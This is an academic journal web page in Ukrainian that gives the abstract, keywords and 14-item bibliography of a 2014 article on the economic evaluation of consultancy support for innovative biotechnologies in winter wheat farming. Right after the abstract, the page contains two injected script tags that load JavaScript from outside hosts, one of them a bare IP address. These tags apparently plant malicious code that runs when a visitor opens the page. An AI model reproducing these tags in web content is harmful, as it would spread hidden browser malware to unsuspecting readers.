ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 631.115(075.8)
Інноваційна діяльність та інтелектуальний капітал

Оцінка ефективності інформаційно-консультаційного забезпечення поширення інноваційних біотехнологій в умовах ризику та невизначеності / Литовченко А. М. // Економіка АПК. - 2014. - № 2 - С. 70

Проаналізовано основні економічні показники впливу сучасних біотехнологічних елементів на формування врожайності озимої пшениці. Визначено, що ефективні консультаційні заходи мають базуватися на економічно обґрунтованих і статистично перевірених результатах випробувань інноваційних елементів у різних ґрунтово-кліматичних зонах України. Проведено розрахунки впливу інноваційних елементів біотехнологій порівняно з традиційними технологіями. Для кожного з елементів технології визначено оцінку середнього показника врожайності та незміщену оцінку дисперсії, розраховуються довірчі інтервали для очікуваних значень урожайності й коефіцієнт варіації, а також показник рентабельності запровадження інновацій в рослинництві. Проведено оцінку надійності одержаних результатів при формуванні позитивного ставлення фермера до інновацій в умовах ризику та невизначеності. Табл.: 3. Рис.: 2. Бібліогр.: 14.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: інноваційні біотехнології, інформаційно-консультаційна діяльність, функція корисності, ризики, невизначеність

Список використаних джерел

 1. Трибель С.О. Методичні рекомендації до проведення лабораторних занять для підготовки студентів із напряму 095.105 – «Захист рослин» / С.О. Трибель, А.Г. Бабич, О.А. Бабич. – К.: Видавничий центр НУБіП України. – 2011. – С. 54.
 2. Dowdy S. Statistics for research / S.Wearden. – 1983. – Sons Inc., US. – Р.186–191.
 3. Камінський А.Б. Економічний ризик та методи його вимірювання / А.Б. Камінський. — К.: Козаки, 2002. — 120 с.
 4. Кальна-Дубінюк Т.П. Економічні аспекти застосування інноваційних біотехнологій в рослинництві та їх консультаційне забезпечення для вирішення проблем продовольчої безпеки України / Т.П. Кальна-Дубінюк, А.М. Литовченко // Науковий вісник НУБіП України, 2009. – №141. – С. 137.
 5. Пономаренко С.П. Біотехнології для озимих культур / С.П. Пономаренко // МНТЦ «Агробіотех», 2013 // www.agrobiotech.com.ua/ru/statii/item/63-biotechnology.
 6. www.agroscience.com.ua/plant/istoriya-ta-poshyrennya-ozymoi-pshenytsi.
 7. Кропивко М.Ф. Організація інформаційно-консультаційної діяльності: навч. посіб. / [М. Ф. Кропивко, Т. П. Кальна-Дубінюк, М.Ф. Безкровний та ін.]. – М.: Агроконсалт, 2004. – 362 с.
 8. Саблук П.Т. Підприємство в аграрній сфері економіки / П.Т. Саблук, М. Й. Малік, В.П. Рябоконь. – 2-ге вид. – К.: ІАЕ УААН, 1998. – 514 с.
 9. Ульянченко О. В. Роль информационных технологий в формировании конкурентних преимуществ сельскохозяйственных предприятий / О.В. Ульянченко, Л.А. Евчук // Молодой ученый. – Чита. – 2012. –№ 8 (43). – С. 146– 149.
 10. Badcock B.A. Risk Management and the Environment: Agriculture in Perspective / B.A.Badcock , R.W. Fraser, J.N. Lekasis // Kluwer Academic Publisher Dordrecht, Nethelands, 2011. – Р. 115–125.
 11. Kalna-Dubinyuk T.P. The Development of Extension Service in Ukraine and the Worldwide Experience. Text-book / T. P. Kalna-Dubinyuk, S. R. Johnson – Kyiv: Agrarna nauka, 2005. – 200 с.
 12. Kozári J. The Role of Extension in the Technical Improvement of Agricultural Enterprises / J. Kozári, K. Tyth // Науковий вісник НУБіП України.Серія «Економіка, аграрний менеджмент, бізнес». – 2011. – Вип. 168, ч.3. – С.34–39.
 13. Leeuwis Cees. Communication for rural innovation: rethinking agricultural extension/ Cees Leeuwis, Anne van den Ban// Third edition, Blackwell Science, 2004.
 14. Rivera W.M. Contracting for Agricultural Extension / W.M.Rivera, W.Zijp. – CAB International 2002. – 189 p.
Читати статтю: 14_02_70-75.pdf
Читати переклад статті: 1402kalna-dubiniuk_lytovchenko.pdf